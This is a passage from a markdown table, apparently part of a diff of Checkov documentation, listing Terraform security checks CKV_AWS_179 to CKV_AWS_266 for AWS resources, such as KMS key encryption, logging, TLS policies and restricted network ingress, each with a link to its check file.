[FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | +| 268 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | +| 269 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | +| 270 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | +| 271 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | +| 272 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | +| 273 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | +| 274 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) 
| +| 275 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | +| 276 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 277 | CKV_AWS_187 | resource | aws_sagemaker_notebook_instance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 278 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | +| 279 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | +| 280 | CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | +| 281 | CKV_AWS_192 | resource | 
aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | +| 282 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | +| 283 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 284 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 285 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 286 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 287 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | [ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | +| 288 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit 
logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | +| 289 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | +| 290 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | +| 291 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | +| 292 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | +| 293 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | +| 294 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | +| 295 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | +| 296 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | +| 297 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | +| 298 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | +| 299 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 300 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 301 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | +| 302 | CKV_AWS_210 | resource | 
aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | +| 303 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | +| 304 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | +| 305 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | +| 306 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | +| 307 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | +| 308 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | +| 309 | CKV_AWS_217 | resource | 
aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | +| 310 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | +| 311 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | +| 312 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | +| 313 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | +| 314 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | +| 315 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | +| 316 | 
CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | +| 317 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | +| 318 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 319 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 320 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | +| 321 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 322 | CKV_AWS_228 | resource | aws_opensearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py) | +| 323 | CKV_AWS_229 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 
| Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 324 | CKV_AWS_229 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21 | Terraform | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py) | +| 325 | CKV_AWS_230 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 326 | CKV_AWS_230 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20 | Terraform | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py) | +| 327 | CKV_AWS_231 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 328 | CKV_AWS_231 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py) | +| 329 | CKV_AWS_232 | resource | aws_network_acl | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 330 | CKV_AWS_232 | resource | aws_network_acl_rule | Ensure no NACL allow ingress from 
0.0.0.0:0 to port 22 | Terraform | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py) | +| 331 | CKV_AWS_233 | resource | aws_acm_certificate | Ensure Create before destroy for ACM certificates | Terraform | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py) | +| 332 | CKV_AWS_234 | resource | aws_acm_certificate | Verify logging preference for ACM certificates | Terraform | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py) | +| 333 | CKV_AWS_235 | resource | aws_ami_copy | Ensure that copied AMIs are encrypted | Terraform | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py) | +| 334 | CKV_AWS_236 | resource | aws_ami_copy | Ensure AMI copying uses a CMK | Terraform | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py) | +| 335 | CKV_AWS_237 | resource | aws_api_gateway_rest_api | Ensure Create before destroy for API Gateway | Terraform | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py) | +| 336 | CKV_AWS_238 | resource | aws_guardduty_detector | Ensure that GuardDuty detector is enabled | Terraform | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py) | +| 337 | CKV_AWS_239 | resource | aws_dax_cluster | Ensure DAX cluster endpoint is using TLS | Terraform | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py) | +| 338 | 
CKV_AWS_240 | resource | aws_kinesis_firehose_delivery_stream | Ensure Kinesis Firehose delivery stream is encrypted | Terraform | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py) | +| 339 | CKV_AWS_241 | resource | aws_kinesis_firehose_delivery_stream | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK | Terraform | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py) | +| 340 | CKV_AWS_242 | resource | aws_mwaa_environment | Ensure MWAA environment has scheduler logs enabled | Terraform | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py) | +| 341 | CKV_AWS_243 | resource | aws_mwaa_environment | Ensure MWAA environment has worker logs enabled | Terraform | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py) | +| 342 | CKV_AWS_244 | resource | aws_mwaa_environment | Ensure MWAA environment has webserver logs enabled | Terraform | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py) | +| 343 | CKV_AWS_245 | resource | aws_db_instance_automated_backups_replication | Ensure replicated backups are encrypted at rest using KMS CMKs | Terraform | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py) | +| 344 | CKV_AWS_246 | resource | aws_rds_cluster_activity_stream | Ensure RDS Cluster activity streams are encrypted using KMS CMKs | Terraform | 
[RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py) | +| 345 | CKV_AWS_247 | resource | aws_elasticsearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 346 | CKV_AWS_247 | resource | aws_opensearch_domain | Ensure all data stored in the Elasticsearch is encrypted with a CMK | Terraform | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py) | +| 347 | CKV_AWS_248 | resource | aws_elasticsearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 348 | CKV_AWS_248 | resource | aws_opensearch_domain | Ensure that Elasticsearch is not using the default Security Group | Terraform | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py) | +| 349 | CKV_AWS_249 | resource | aws_ecs_task_definition | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions | Terraform | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py) | +| 350 | CKV_AWS_250 | resource | aws_db_instance | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | 
[RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 351 | CKV_AWS_250 | resource | aws_rds_cluster | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/) | Terraform | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py) | +| 352 | CKV_AWS_251 | resource | aws_cloudtrail | Ensure CloudTrail logging is enabled | Terraform | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py) | +| 353 | CKV_AWS_252 | resource | aws_cloudtrail | Ensure CloudTrail defines an SNS Topic | Terraform | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py) | +| 354 | CKV_AWS_253 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted | Terraform | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py) | +| 355 | CKV_AWS_254 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region events are encrypted with Customer Managed Key | Terraform | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py) | +| 356 | CKV_AWS_255 | resource | aws_dlm_lifecycle_policy | Ensure DLM cross region schedules are encrypted | Terraform | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py) | +| 357 | CKV_AWS_256 | resource | aws_dlm_lifecycle_policy | 
Ensure DLM cross region schedules are encrypted using a Customer Managed Key | Terraform | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py) | +| 358 | CKV_AWS_257 | resource | aws_codecommit_approval_rule_template | Ensure CodeCommit branch changes have at least 2 approvals | Terraform | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py) | +| 359 | CKV_AWS_258 | resource | aws_lambda_function_url | Ensure that Lambda function URLs AuthType is not None | Terraform | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py) | +| 360 | CKV_AWS_259 | resource | aws_cloudfront_response_headers_policy | Ensure CloudFront response header policy enforces Strict Transport Security | Terraform | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py) | +| 361 | CKV_AWS_260 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 362 | CKV_AWS_260 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 363 | CKV_AWS_260 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80 | Terraform | 
[SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py) | +| 364 | CKV_AWS_261 | resource | aws_alb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 365 | CKV_AWS_261 | resource | aws_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py) | +| 366 | CKV_AWS_262 | resource | aws_kendra_index | Ensure Kendra index Server side encryption uses CMK | Terraform | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py) | +| 367 | CKV_AWS_263 | resource | aws_appflow_flow | Ensure AppFlow flow uses CMK | Terraform | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py) | +| 368 | CKV_AWS_264 | resource | aws_appflow_connector_profile | Ensure AppFlow connector profile uses CMK | Terraform | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py) | +| 369 | CKV_AWS_265 | resource | aws_keyspaces_table | Ensure Keyspaces Table uses CMK | Terraform | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py) | +| 370 | CKV_AWS_266 | resource | aws_db_snapshot_copy | Ensure DB Snapshot copy uses CMK | Terraform | 
